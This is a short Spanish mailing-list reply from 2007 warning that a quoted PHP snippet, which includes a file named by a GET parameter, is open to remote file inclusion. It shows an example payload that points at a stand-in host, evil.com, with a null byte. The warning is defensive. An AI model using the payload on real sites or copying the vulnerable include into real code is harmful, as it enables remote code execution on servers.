1/2 OT Mod_Rewrite Apache

Jue Feb 8 21:16:02 CLST 2007

El 8/02/07, Daniel Carrero Canales <dcarrero en vallenar.cl> escribió:

> Estimados:
>         Tengo una idea con el mod_rewrite de Apache para URLS accesibles, hago
> una pagina (prpmantencion.php) a la cual le envio secciones por GET
> (prpmantencion.php?gls_sec=usuario) y dependiendo de la seccion muestra
> el contenido ej:
>
>         $gls_sec =$_GET['gls_sec'];
>         if($gls_sec!=""){
>                 include($gls_sec.".php");

las tres primeras lienase de tu codigo tienen un atroz agujero de seguridad.

si $_GET['gls_sec'] es por ejemplo

$_GET['gls_sec'] = "http://www.evil.com/evil.txt%00" (notese el NULL
byte al final)
PHP descarta el ".php" (y el resto de la sentencia) incluyendo el
archivo remoto http://www.evil.com/evil.txt y intepretandolo como
codigo PHP. en fin the OwNean :-P